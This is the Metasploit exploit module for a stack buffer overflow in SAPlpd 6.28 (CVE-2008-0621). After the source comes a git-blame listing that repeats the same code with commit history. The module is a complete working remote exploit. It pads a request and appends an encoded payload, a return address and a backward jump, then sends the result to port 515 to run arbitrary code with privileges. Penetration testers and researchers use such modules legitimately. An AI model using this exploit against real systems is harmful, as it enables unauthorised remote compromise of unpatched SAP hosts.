metasploit-framework/modules/exploits/windows/lpd/saplpd.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SAP SAPLPD 6.28 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .
        By sending an overly long argument, an attacker may be able to execute arbitrary
        code.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-0621' ],
          [ 'OSVDB', '41127' ],
          [ 'BID', '27613' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x0a",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'SAPlpd 6.28.0.1 (SAP Release 6.40)',   { 'Ret' => 0x005e72d7 } ], #SAPlpd.exe 3/7/2006
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Feb 4 2008',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(515)], self)
  end

  def exploit
    connect

    sploit =  "\x02"
    sploit << rand_text_alpha_upper(484 - payload.encoded.length)
    sploit << payload.encoded
    sploit << [target.ret].pack('V')
    sploit << [0xe9, -375].pack('CV')

    print_status("Trying target #{target.name}...")

    sock.puts(sploit)

    handler
    disconnect
  end
end
added exploit module saplpd.rb. git-svn-id: file:///home/svn/framework3/trunk@5409 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-10 01:48:30 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
added exploit module saplpd.rb. git-svn-id: file:///home/svn/framework3/trunk@5409 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-10 01:48:30 +00:00			`##`

			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = GoodRanking`
added exploit module saplpd.rb. git-svn-id: file:///home/svn/framework3/trunk@5409 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-10 01:48:30 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Tcp`
added exploit module saplpd.rb. git-svn-id: file:///home/svn/framework3/trunk@5409 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-10 01:48:30 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'SAP SAPLPD 6.28 Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .`
			`By sending an overly long argument, an attacker may be able to execute arbitrary`
			`code.`
			`},`
			`'Author' => 'MC',`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2008-0621' ],`
			`[ 'OSVDB', '41127' ],`
			`[ 'BID', '27613' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00\x0a",`
			`'StackAdjustment' => -3500,`
			`'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'SAPlpd 6.28.0.1 (SAP Release 6.40)', { 'Ret' => 0x005e72d7 } ], #SAPlpd.exe 3/7/2006`
			`],`
			`'Privileged' => true,`
			`'DisclosureDate' => 'Feb 4 2008',`
			`'DefaultTarget' => 0))`
added exploit module saplpd.rb. git-svn-id: file:///home/svn/framework3/trunk@5409 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-10 01:48:30 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options([Opt::RPORT(515)], self)`
			`end`
added exploit module saplpd.rb. git-svn-id: file:///home/svn/framework3/trunk@5409 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-10 01:48:30 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`connect`
added exploit module saplpd.rb. git-svn-id: file:///home/svn/framework3/trunk@5409 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-10 01:48:30 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sploit = "\x02"`
			`sploit << rand_text_alpha_upper(484 - payload.encoded.length)`
			`sploit << payload.encoded`
			`sploit << [target.ret].pack('V')`
			`sploit << [0xe9, -375].pack('CV')`
added exploit module saplpd.rb. git-svn-id: file:///home/svn/framework3/trunk@5409 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-10 01:48:30 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Trying target #{target.name}...")`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sock.puts(sploit)`
added exploit module saplpd.rb. git-svn-id: file:///home/svn/framework3/trunk@5409 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-10 01:48:30 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`disconnect`
			`end`
OSVDB references updates from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6812 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-16 16:02:24 +00:00			`end`